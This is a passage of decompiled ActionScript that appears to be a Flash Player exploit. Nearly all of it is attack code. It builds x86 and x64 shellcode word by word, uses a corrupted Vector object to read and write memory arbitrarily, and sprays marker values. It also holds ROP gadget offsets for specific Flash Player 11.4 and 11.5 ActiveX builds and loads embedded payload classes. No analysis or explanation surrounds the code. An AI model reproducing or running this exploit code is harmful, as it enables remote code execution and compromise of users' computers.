_loc_17.writeUnsignedInt(0x47c7b4ff);
_loc_17.writeUnsignedInt(0x4b19c234);
_loc_17.writeUnsignedInt(0x3847c701);
_loc_17.writeUnsignedInt(0x9aa5f07d);
_loc_17.writeUnsignedInt(0xe43c47c7);
_loc_17.writeUnsignedInt(0xc7c5942b);
_loc_17.writeUnsignedInt(0x9dec4047);
_loc_17.writeUnsignedInt(0x47c7a45f);
_loc_17.writeUnsignedInt(0x3377cc44);
_loc_17.writeUnsignedInt(0x127e98f);
_loc_17.writeUnsignedInt(0xc0330000);
_loc_17.writeUnsignedInt(0x30a164);
_loc_17.writeUnsignedInt(0x408b0000);
_loc_17.writeUnsignedInt(0x14408b0c);
_loc_17.writeUnsignedInt(0x8b008b);
_loc_17.writeUnsignedInt(0x8b10408b);
_loc_17.writeUnsignedInt(0x6af78be8);
_loc_17.writeUnsignedInt(0xc1e85911);
_loc_17.writeUnsignedInt(0xe2000000);
_loc_17.writeUnsignedInt(0x81ee8bf9);
_loc_17.writeUnsignedInt(0x400ec);
_loc_17.writeUnsignedInt(0x89c03300);
_loc_17.writeUnsignedInt(0x7d8b3045);
_loc_17.writeUnsignedInt(0x815f545c);
_loc_17.writeUnsignedInt(0x200ec);
_loc_17.writeUnsignedInt(0x685700);
_loc_17.writeUnsignedInt(0xff000001);
_loc_17.writeUnsignedInt(0xc0330855);
_loc_17.writeUnsignedInt(0x73c8040);
_loc_17.writeUnsignedInt(0x89f97500);
_loc_17.writeUnsignedInt(0x4c76045);
_loc_17.writeUnsignedInt(0x63626107);
_loc_17.writeUnsignedInt(0x744c72e);
_loc_17.writeUnsignedInt(0x67666304);
_loc_17.writeUnsignedInt(0x6a006a00);
_loc_17.writeUnsignedInt(0x6a026a00);
_loc_17.writeUnsignedInt(0x68006a00);
_loc_17.writeUnsignedInt(0x40000000);
_loc_17.writeUnsignedInt(0x10458b57);
_loc_17.writeUnsignedInt(0x49e8);
_loc_17.writeUnsignedInt(0xf88300);
_loc_17.writeUnsignedInt(0x4589327e);
_loc_17.writeUnsignedInt(0x4045c734);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(0x458d006a);
_loc_17.writeUnsignedInt(0x75ff5044);
_loc_17.writeUnsignedInt(0x5c75ff58);
_loc_17.writeUnsignedInt(0xff3475ff);
_loc_17.writeUnsignedInt(0x75ff2055);
_loc_17.writeUnsignedInt(0x2855ff34);
_loc_17.writeUnsignedInt(0x2045c757);
_loc_17.writeUnsignedInt(0x41780963);
_loc_17.writeUnsignedInt(0xe800458b);
_loc_17.writeUnsignedInt(18);
_loc_17.writeUnsignedInt(0x7c4c481);
_loc_17.writeUnsignedInt(0x8d610000);
_loc_17.writeUnsignedInt(0x6ac3d465);
_loc_17.writeUnsignedInt(0xffff6aff);
_loc_17.writeUnsignedInt(0x38800c55);
_loc_17.writeUnsignedInt(0x800a74e8);
_loc_17.writeUnsignedInt(0x574e938);
_loc_17.writeUnsignedInt(0x75eb3880);
_loc_17.writeUnsignedInt(0x5788111);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0xff8b0874);
_loc_17.writeUnsignedInt(0x8dec8b55);
_loc_17.writeUnsignedInt(0xe0ff0540);
_loc_17.writeUnsignedInt(0x758b5651);
_loc_17.writeUnsignedInt(0x2e748b3c);
_loc_17.writeUnsignedInt(0x56f50378);
_loc_17.writeUnsignedInt(0x320768b);
_loc_17.writeUnsignedInt(0x49c933f5);
_loc_17.writeUnsignedInt(0xc503ad41);
_loc_17.writeUnsignedInt(0xbe0fdb33);
_loc_17.writeUnsignedInt(0x74d63a10);
_loc_17.writeUnsignedInt(0x7cbc108);
_loc_17.writeUnsignedInt(0xeb40da03);
_loc_17.writeUnsignedInt(0x751f3bf1);
_loc_17.writeUnsignedInt(0x5e8b5ee7);
_loc_17.writeUnsignedInt(0x66dd0324);
_loc_17.writeUnsignedInt(0x8b4b0c8b);
_loc_17.writeUnsignedInt(0xdd031c5e);
_loc_17.writeUnsignedInt(0x38b048b);
_loc_17.writeUnsignedInt(0x595eabc5);
_loc_17.writeUnsignedInt(0xfed4e8c3);
_loc_17.writeUnsignedInt(0x9090ffff);
_loc_17.writeUnsignedInt(0x90909090);
_loc_18.data.now = new Date().time;
_loc_18.flush();
_loc_18.close();
_loc_28 = new this.the_x32_Class();
_loc_17.writeBytes(_loc_28, 0, _loc_28.length);
_loc_12 = _loc_13;
_loc_15 = (_loc_12 + 64 - _loc_10 - 8) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_15 = (_loc_12 + 8 - _loc_10 - 8) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_12 = _loc_12 + _loc_14;
_loc_17.position = _loc_14 + 112;
_loc_17.writeUnsignedInt(_loc_25);
_loc_17.position = _loc_17.position - 112 - 4;
_loc_17.writeUnsignedInt(_loc_26);
_loc_17.writeUnsignedInt(_loc_12 + 136);
_loc_17.writeUnsignedInt(_loc_12);
_loc_17.writeUnsignedInt(0x2000);
_loc_17.writeUnsignedInt(0x1000);
_loc_17.writeUnsignedInt(64);
_loc_17.position = _loc_17.position + 112;
_loc_17.writeUnsignedInt(0xec836090);
_loc_17.writeUnsignedInt(0x64db3370);
_loc_17.writeUnsignedInt(0x8b185b8b);
_loc_17.writeUnsignedInt(0x5b8b305b);
_loc_17.writeUnsignedInt(0x1c5b8b0c);
_loc_17.writeUnsignedInt(0x8b08538b);
_loc_17.writeUnsignedInt(0x7c8b3c7a);
_loc_17.writeUnsignedInt(0xbc8d2c3a);
_loc_17.writeUnsignedInt(0xe0003a);
_loc_17.writeUnsignedInt(0x408bb800);
_loc_17.writeUnsignedInt(0x739c330);
_loc_17.writeUnsignedInt(0xeb470374);
_loc_17.writeUnsignedInt(0x68ef8bf9);
_loc_17.writeUnsignedInt(0x6c0065);
_loc_17.writeUnsignedInt(0x6e007268);
_loc_17.writeUnsignedInt(0x6b6800);
_loc_17.writeUnsignedInt(0x33fc0065);
_loc_17.writeUnsignedInt(0x8b1b8bc9);
_loc_17.writeUnsignedInt(0x207b8bf4);
_loc_17.writeUnsignedInt(0xa7f303b1);
_loc_17.writeUnsignedInt(0x5b8bf375);
_loc_17.writeUnsignedInt(0x3c538b08);
_loc_17.writeUnsignedInt(0x781a548b);
_loc_17.writeUnsignedInt(0xec1a448d);
_loc_17.writeUnsignedInt(0x548bd5ff);
_loc_17.writeUnsignedInt(0xd303201a);
_loc_17.writeUnsignedInt(0xc933c303);
_loc_17.writeUnsignedInt(0x10e8);
_loc_17.writeUnsignedInt(0x74655300);
_loc_17.writeUnsignedInt(0x65726854);
_loc_17.writeUnsignedInt(0x6f436461);
_loc_17.writeUnsignedInt(0x7865746e);
_loc_17.writeUnsignedInt(0x24348b74);
_loc_17.writeUnsignedInt(0xfb033a8b);
_loc_17.writeUnsignedInt(0xa7f304b1);
_loc_17.writeUnsignedInt(0xc2830874);
_loc_17.writeUnsignedInt(0x4c08304);
_loc_17.writeUnsignedInt(0x108bebeb);
_loc_17.writeUnsignedInt(0xc033d303);
_loc_17.writeUnsignedInt(0x20b1c88b);
_loc_17.writeUnsignedInt(0xabf3fc8b);
_loc_17.writeUnsignedInt(0x102404c7);
_loc_17.writeUnsignedInt(0x54000100);
_loc_17.writeUnsignedInt(0xd2fffe6a);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0x20ec8160);
_loc_17.writeUnsignedInt(0x8b000001);
_loc_17.writeUnsignedInt(0x5c47c7fc);
_loc_17.writeUnsignedInt(_loc_12 + 616 + 176 - 4);
_loc_17.writeUnsignedInt(0x5847c790);
_loc_17.writeUnsignedInt(_loc_28.length);
_loc_15 = (_loc_11 - _loc_10 - 8) / 8;
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[_loc_15] = this.UintToDouble(_loc_12, this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[1]);
new Number(_loc_6.toString());
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[_loc_15] = this.UintToDouble(_loc_16, this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[1]);
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
return;
}
if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 16)[0] == 16)
{
_loc_31 = 0;
_loc_31 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[1];
_loc_9 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[0];
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[16] = this.UintToDouble(0xffffffff, 0);
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[18] = this.UintToDouble(0x41414141, 0);
_loc_32 = _loc_7;
_loc_33 = _loc_22;
_loc_21 = false;
_loc_1 = 0;
while (_loc_1 < 0x4000)
{
if (_loc_21)
{
break;
}
_loc_8 = 1;
while (_loc_8 <= 8)
{
try
{
if (this.ReadDouble(_loc_5[_loc_1][_loc_8] as Vector.<Number>, 0)[0] == 0x41414141)
{
_loc_7 = _loc_1;
_loc_22 = _loc_8;
_loc_21 = true;
break;
}
}
catch (e:Error)
{
}
_loc_8 = _loc_8 + 1;
}
_loc_1 = _loc_1 + 1;
}
if (!_loc_21)
{
while (1)
{
}
}
_loc_1 = 0;
while (_loc_1 < 0x1000)
{
if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1)[0] == 32 && this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[0] == 1)
{
_loc_11 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 2)[0] & 0xfffffff8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 3)[0] & 0xfffffff8;
_loc_13 = _loc_12;
break;
}
_loc_1 = _loc_1 + 1;
}
if (_loc_1 == 0x1000)
{
while (1)
{
}
}
if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 2)[1] != _loc_31 || this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 3)[1] != _loc_31)
{
while (1)
{
}
}
_loc_1 = 0;
while (_loc_1 < 0x4000)
{
_loc_8 = 1;
while (_loc_8 <= 8)
{
if (!(_loc_1 == _loc_7 && _loc_8 == _loc_22) && !(_loc_1 == _loc_32 && _loc_8 == _loc_33))
{
_loc_5[_loc_1][_loc_8] = null;
}
_loc_8 = _loc_8 + 1;
}
_loc_1 = _loc_1 + 1;
}
_loc_1 = 1;
while (_loc_1 < 4)
{
_loc_29 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 16 * _loc_1 + 2 * (_loc_1 - 1));
_loc_30 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 16 * (_loc_1 + 1) + 2 * ((_loc_1 + 1) - 1));
if (_loc_29[1] < _loc_29[0] && _loc_30[1] < _loc_30[0] && _loc_30[0] - _loc_29[0] == 144)
{
_loc_10 = _loc_29[0] - 144 * (_loc_1 + 1);
break;
}
_loc_1 = _loc_1 + 1;
}
if (_loc_10 == 0)
{
while (1)
{
}
}
_loc_1 = 0;
while (_loc_1 < 1024 * 100)
{
_loc_17.writeUnsignedInt(0x41414141);
_loc_1 = _loc_1 + 1;
}
_loc_15 = (_loc_12 + 128 - _loc_10 - 16) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_15 = (_loc_12 + 16 - _loc_10 - 16) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_12 = _loc_12 + _loc_17.position;
_loc_14 = _loc_17.position;
_loc_15 = (_loc_11 - _loc_10 - 16) / 8;
_loc_16 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_25 = 0;
_loc_26 = 0;
_loc_27 = Capabilities.version.toLowerCase();
switch(_loc_27)
{
case "win 11,5,502,146":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x8a6d21;
_loc_26 = _loc_16 - 0x8ab096;
_loc_36 = _loc_16 - 0x8a41dd;
_loc_37 = _loc_16 - 0x75f9c0;
_loc_38 = _loc_16 - 0xa9377c;
_loc_39 = _loc_16 - 0x902ea7;
_loc_40 = _loc_16 - 0xa98908;
}
break;
}
case "win 11,5,502,135":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x8dca4a;
_loc_26 = _loc_16 - 0x8aaf16;
_loc_36 = _loc_16 - 0x8805fa;
_loc_37 = _loc_16 - 0x75fae0;
_loc_38 = _loc_16 - 0x971f1a;
_loc_39 = _loc_16 - 0x902d3f;
_loc_40 = _loc_16 - 0x2f6a71;
}
break;
}
case "win 11,5,502,110":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x8a6cf5;
_loc_26 = _loc_16 - 0x8ab046;
_loc_36 = _loc_16 - 0x88077a;
_loc_37 = _loc_16 - 0x90b8de;
_loc_38 = _loc_16 - 0xa9374c;
_loc_39 = _loc_16 - 0x902e5b;
_loc_40 = _loc_16 - 0x270bff;
}
break;
}
case "win 11,4,402,287":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x4315aa;
_loc_26 = _loc_16 - 0xa00a52 + 0x600fbc;
_loc_36 = _loc_16 - 0xa38d39;
_loc_37 = _loc_16 - 0xa00a52;
_loc_38 = _loc_16 - 0xa3770b;
_loc_39 = _loc_16 - 0x457887;
_loc_40 = _loc_16 - 0x4315aa - 0x59c616;
}
break;
}
case "win 11,4,402,278":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x3fb3a5;
_loc_26 = _loc_16 - 0x3ff6f6;
_loc_36 = _loc_16 - 0x46771b;
_loc_37 = _loc_16 - 0x45b6a2;
_loc_38 = _loc_16 - 0x5e7d87;
_loc_39 = _loc_16 - 0x4574af;
_loc_40 = _loc_16 - 0x17d490;
}
break;
}
case "win 11,4,402,265":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x3fb3a5;
_loc_26 = _loc_16 - 0x3ff6f6;
_loc_36 = _loc_16 - 0x1c774f;
_loc_37 = _loc_16 - 0x117ec7;
_loc_38 = _loc_16 - 0x1c0bce;
_loc_39 = _loc_16 - 0x4574af;
_loc_40 = _loc_16 - 0xe2870;
}
break;
}
default:
{
while (1)
{
}
break;
}
}
_loc_17.endian = Endian.LITTLE_ENDIAN;
_loc_34 = _loc_17.position;
_loc_17.position = _loc_17.position + 224;
_loc_17.writeUnsignedInt(_loc_25);
_loc_17.position = _loc_34;
_loc_17.position = _loc_17.position + 160;
_loc_17.writeUnsignedInt(_loc_12 + 256);
_loc_17.writeUnsignedInt(_loc_31);
_loc_17.position = _loc_34;
_loc_17.writeUnsignedInt(_loc_37);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(64);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_39);
_loc_17.writeUnsignedInt(0);
_loc_17.position = _loc_17.position + 40;
_loc_17.writeUnsignedInt(_loc_36);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_12 + 256);
_loc_17.writeUnsignedInt(_loc_31);
_loc_17.writeUnsignedInt(_loc_38);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(0x2000);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_37);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_26);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_40);
_loc_17.writeUnsignedInt(0);
_loc_17.position = _loc_34 + 256;
_loc_17.writeUnsignedInt(0x55fc9090);
_loc_17.writeUnsignedInt(0xf0e48348);
_loc_17.writeUnsignedInt(0x65d23348);
_loc_17.writeUnsignedInt(0x60528b48);
_loc_17.writeUnsignedInt(0x18528b48);
_loc_17.writeUnsignedInt(0x20528b48);
_loc_17.writeUnsignedInt(0x50728b48);
_loc_17.writeUnsignedInt(0x4ab70f48);
_loc_17.writeUnsignedInt(0xc9334d4a);
_loc_17.writeUnsignedInt(0xacc03348);
_loc_17.writeUnsignedInt(0x27c613c);
_loc_17.writeUnsignedInt(0xc141202c);
_loc_17.writeUnsignedInt(0x3440dc9);
_loc_17.writeUnsignedInt(0x52ede2c8);
_loc_17.writeUnsignedInt(0xba495141);
_loc_17.writeUnsignedInt(0x92af16da);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(0x75ca3b4d);
_loc_17.writeUnsignedInt(0x528b4845);
_loc_17.writeUnsignedInt(0x3c428b20);
_loc_17.writeUnsignedInt(0x8bc20348);
_loc_17.writeUnsignedInt(0x8880);
_loc_17.writeUnsignedInt(0xc0854800);
_loc_17.writeUnsignedInt(0x81483074);
_loc_17.writeUnsignedInt(0x180ec);
_loc_17.writeUnsignedInt(0xfc8b4800);
_loc_17.writeUnsignedInt(0x80ec8148);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x8b50c203);
_loc_17.writeUnsignedInt(0x8b441848);
_loc_17.writeUnsignedInt(0x34c2040);
_loc_17.writeUnsignedInt(0x4c8948c2);
_loc_17.writeUnsignedInt(0x894c1824);
_loc_17.writeUnsignedInt(0x48202444);
_loc_17.writeUnsignedInt(0x28244489);
_loc_17.writeUnsignedInt(0x594108eb);
_loc_17.writeUnsignedInt(0x128b485a);
_loc_17.writeUnsignedInt(0x415182eb);
_loc_17.writeUnsignedInt(0xdaba4950);
_loc_17.writeUnsignedInt(0x14fdaf6);
_loc_17.writeUnsignedInt(0xe8000000);
_loc_17.writeUnsignedInt(315);
_loc_17.writeUnsignedInt(0x49078948);
_loc_17.writeUnsignedInt(0xae572dba);
_loc_17.writeUnsignedInt(347);
_loc_17.writeUnsignedInt(0x129e800);
_loc_17.writeUnsignedInt(0x89480000);
_loc_17.writeUnsignedInt(0xba490847);
_loc_17.writeUnsignedInt(0x528796c6);
_loc_17.writeUnsignedInt(1);
_loc_17.writeUnsignedInt(0x116e8);
_loc_17.writeUnsignedInt(0x47894800);
_loc_17.writeUnsignedInt(0x4cba4910);
_loc_17.writeUnsignedInt(0x1072677);
_loc_17.writeUnsignedInt(0xe8000000);
_loc_17.writeUnsignedInt(259);
_loc_17.writeUnsignedInt(0x18478948);
_loc_17.writeUnsignedInt(0xf330ba49);
_loc_17.writeUnsignedInt(0xe449);
_loc_17.writeUnsignedInt(0xf0e80000);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x48204789);
_loc_17.writeUnsignedInt(0x8d48f78b);
_loc_17.writeUnsignedInt(0x80be);
_loc_17.writeUnsignedInt(0x40b900);
_loc_17.writeUnsignedInt(0x33480000);
_loc_17.writeUnsignedInt(0xb9abf3c0);
_loc_17.writeUnsignedInt(256);
_loc_17.writeUnsignedInt(0x80868d48);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x8b48d08b);
_loc_17.writeUnsignedInt(0x568b4cd8);
_loc_17.writeUnsignedInt(0xd2ff4120);
_loc_17.writeUnsignedInt(0x80868d48);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x3348c933);
_loc_17.writeUnsignedInt(0x30c8adb);
_loc_17.writeUnsignedInt(0x80c3ff48);
_loc_17.writeUnsignedInt(0xf57500f9);
_loc_17.writeUnsignedInt(0xc7cbff48);
_loc_17.writeUnsignedInt(0x6f630304);
_loc_17.writeUnsignedInt(0x44c7666e);
_loc_17.writeUnsignedInt(0x67690403);
_loc_17.writeUnsignedInt(0x44c7642e);
_loc_17.writeUnsignedInt(0x6c6c0803);
_loc_17.writeUnsignedInt(0x33450000);
_loc_17.writeUnsignedInt(0x44c748c9);
_loc_17.writeUnsignedInt(0x3024);
_loc_17.writeUnsignedInt(0x8d480000);
_loc_17.writeUnsignedInt(0x808e);
_loc_17.writeUnsignedInt(0x2b84100);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0xc2c7);
_loc_17.writeUnsignedInt(0x44c74000);
_loc_17.writeUnsignedInt(0x802824);
_loc_17.writeUnsignedInt(0x44c70000);
_loc_17.writeUnsignedInt(0x22024);
_loc_17.writeUnsignedInt(0x8b4c0000);
_loc_17.writeUnsignedInt(0xd2ff4116);
_loc_17.writeUnsignedInt(0x48d88b48);
_loc_17.writeUnsignedInt(0xffff883);
_loc_17.writeUnsignedInt(0x9c84);
_loc_17.writeUnsignedInt(0x4c8d4c00);
_loc_17.writeUnsignedInt(0xba484024);
_loc_17.writeUnsignedInt(0x42424242);
_loc_17.writeUnsignedInt(0x42424242);
_loc_17.writeUnsignedInt(0xb8419090);
_loc_17.writeUnsignedInt(0x41414141);
_loc_17.writeUnsignedInt(0x48cb8b48);
_loc_17.writeUnsignedInt(0x202444c7);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(0x8568b4c);
_loc_17.writeUnsignedInt(0x48d2ff41);
_loc_17.writeUnsignedInt(0x7400f883);
_loc_17.writeUnsignedInt(0xcb8b486c);
_loc_17.writeUnsignedInt(0x10568b4c);
_loc_17.writeUnsignedInt(0x48d2ff41);
_loc_17.writeUnsignedInt(0x808e8d);
_loc_17.writeUnsignedInt(0x8b4c0000);
_loc_17.writeUnsignedInt(0xff411856);
_loc_17.writeUnsignedInt(0x4852ebd2);
_loc_17.writeUnsignedInt(0x10244c8b);
_loc_17.writeUnsignedInt(0x24448b4c);
_loc_17.writeUnsignedInt(0xc9ff4808);
_loc_17.writeUnsignedInt(0x88348b41);
_loc_17.writeUnsignedInt(0x4df20348);
_loc_17.writeUnsignedInt(0x3348c933);
_loc_17.writeUnsignedInt(0xc141acc0);
_loc_17.writeUnsignedInt(0x3440dc9);
_loc_17.writeUnsignedInt(0x75c43ac8);
_loc_17.writeUnsignedInt(0xc18149f1);
_loc_17.writeUnsignedInt(0x92af16da);
_loc_17.writeUnsignedInt(0x75ca3b45);
_loc_17.writeUnsignedInt(0x448b48d8);
_loc_17.writeUnsignedInt(0x8b444024);
_loc_17.writeUnsignedInt(0x34c2440);
_loc_17.writeUnsignedInt(0x8b4166c2);
_loc_17.writeUnsignedInt(0x8b44480c);
_loc_17.writeUnsignedInt(0x34c1c40);
_loc_17.writeUnsignedInt(0x48b41c2);
_loc_17.writeUnsignedInt(0xc2034888);
_loc_17.writeUnsignedInt(0xb94990c3);
_loc_17.writeUnsignedInt(0x47474747);
_loc_17.writeUnsignedInt(0x41474747);
_loc_17.writeUnsignedInt(0x1001c741);
_loc_17.writeUnsignedInt(0x4d000000);
_loc_17.writeUnsignedInt(0xff70818d);
_loc_17.writeUnsignedInt(0x8b49ffff);
_loc_17.writeUnsignedInt(0x894901);
_loc_17.writeUnsignedInt(0x8418b49);
_loc_17.writeUnsignedInt(0x8408949);
_loc_17.writeUnsignedInt(0xb9499090);
_loc_17.writeUnsignedInt(0x48484848);
_loc_17.writeUnsignedInt(0x48484848);
_loc_17.writeUnsignedInt(0xb8419090);
_loc_17.writeUnsignedInt(0x49494949);
_loc_17.writeUnsignedInt(0x41018945);
_loc_17.writeUnsignedInt(0x441c7);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0xc3a8658d);
_loc_17.writeUnsignedInt(0x90909090);
_loc_18.data.now = new Date().time;
_loc_18.flush();
_loc_18.close();
_loc_35 = new this.the_x64_Class();
_loc_17.writeBytes(_loc_35, 0, _loc_35.length);
_loc_12 = _loc_13;
_loc_15 = (_loc_12 + 128 - _loc_10 - 16) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_15 = (_loc_12 + 16 - _loc_10 - 16) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_12 = _loc_12 + _loc_14;
_loc_17.position = _loc_14;
_loc_34 = _loc_17.position;
_loc_17.position = _loc_17.position + 224;
_loc_17.writeUnsignedInt(_loc_25);
_loc_17.position = _loc_34;
_loc_17.position = _loc_17.position + 160;
_loc_17.writeUnsignedInt(_loc_12 + 256);
_loc_17.writeUnsignedInt(_loc_31);
_loc_17.position = _loc_34;
_loc_17.writeUnsignedInt(_loc_37);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(64);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_39);
_loc_17.writeUnsignedInt(0);
_loc_17.position = _loc_17.position + 40;
_loc_17.writeUnsignedInt(_loc_36);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_12 + 256);
_loc_17.writeUnsignedInt(_loc_31);
_loc_17.writeUnsignedInt(_loc_38);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(0x2000);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_37);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_26);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(_loc_40);
_loc_17.writeUnsignedInt(0);
_loc_17.position = _loc_34 + 256;
_loc_17.writeUnsignedInt(0x55fc9090);
_loc_17.writeUnsignedInt(0xf0e48348);
_loc_17.writeUnsignedInt(0x65d23348);
_loc_17.writeUnsignedInt(0x60528b48);
_loc_17.writeUnsignedInt(0x18528b48);
_loc_17.writeUnsignedInt(0x20528b48);
_loc_17.writeUnsignedInt(0x50728b48);
_loc_17.writeUnsignedInt(0x4ab70f48);
_loc_17.writeUnsignedInt(0xc9334d4a);
_loc_17.writeUnsignedInt(0xacc03348);
_loc_17.writeUnsignedInt(0x27c613c);
_loc_17.writeUnsignedInt(0xc141202c);
_loc_17.writeUnsignedInt(0x3440dc9);
_loc_17.writeUnsignedInt(0x52ede2c8);
_loc_17.writeUnsignedInt(0xba495141);
_loc_17.writeUnsignedInt(0x92af16da);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(0x75ca3b4d);
_loc_17.writeUnsignedInt(0x528b4845);
_loc_17.writeUnsignedInt(0x3c428b20);
_loc_17.writeUnsignedInt(0x8bc20348);
_loc_17.writeUnsignedInt(0x8880);
_loc_17.writeUnsignedInt(0xc0854800);
_loc_17.writeUnsignedInt(0x81483074);
_loc_17.writeUnsignedInt(0x180ec);
_loc_17.writeUnsignedInt(0xfc8b4800);
_loc_17.writeUnsignedInt(0x80ec8148);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x8b50c203);
_loc_17.writeUnsignedInt(0x8b441848);
_loc_17.writeUnsignedInt(0x34c2040);
_loc_17.writeUnsignedInt(0x4c8948c2);
_loc_17.writeUnsignedInt(0x894c1824);
_loc_17.writeUnsignedInt(0x48202444);
_loc_17.writeUnsignedInt(0x28244489);
_loc_17.writeUnsignedInt(0x594108eb);
_loc_17.writeUnsignedInt(0x128b485a);
_loc_17.writeUnsignedInt(0x415182eb);
_loc_17.writeUnsignedInt(0xdaba4950);
_loc_17.writeUnsignedInt(0x14fdaf6);
_loc_17.writeUnsignedInt(0xe8000000);
_loc_17.writeUnsignedInt(315);
_loc_17.writeUnsignedInt(0x49078948);
_loc_17.writeUnsignedInt(0xae572dba);
_loc_17.writeUnsignedInt(347);
_loc_17.writeUnsignedInt(0x129e800);
_loc_17.writeUnsignedInt(0x89480000);
_loc_17.writeUnsignedInt(0xba490847);
_loc_17.writeUnsignedInt(0x528796c6);
_loc_17.writeUnsignedInt(1);
_loc_17.writeUnsignedInt(0x116e8);
_loc_17.writeUnsignedInt(0x47894800);
_loc_17.writeUnsignedInt(0x4cba4910);
_loc_17.writeUnsignedInt(0x1072677);
_loc_17.writeUnsignedInt(0xe8000000);
_loc_17.writeUnsignedInt(259);
_loc_17.writeUnsignedInt(0x18478948);
_loc_17.writeUnsignedInt(0xf330ba49);
_loc_17.writeUnsignedInt(0xe449);
_loc_17.writeUnsignedInt(0xf0e80000);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x48204789);
_loc_17.writeUnsignedInt(0x8d48f78b);
_loc_17.writeUnsignedInt(0x80be);
_loc_17.writeUnsignedInt(0x40b900);
_loc_17.writeUnsignedInt(0x33480000);
_loc_17.writeUnsignedInt(0xb9abf3c0);
_loc_17.writeUnsignedInt(256);
_loc_17.writeUnsignedInt(0x80868d48);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x8b48d08b);
_loc_17.writeUnsignedInt(0x568b4cd8);
_loc_17.writeUnsignedInt(0xd2ff4120);
_loc_17.writeUnsignedInt(0x80868d48);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0x3348c933);
_loc_17.writeUnsignedInt(0x30c8adb);
_loc_17.writeUnsignedInt(0x80c3ff48);
_loc_17.writeUnsignedInt(0xf57500f9);
_loc_17.writeUnsignedInt(0xc7cbff48);
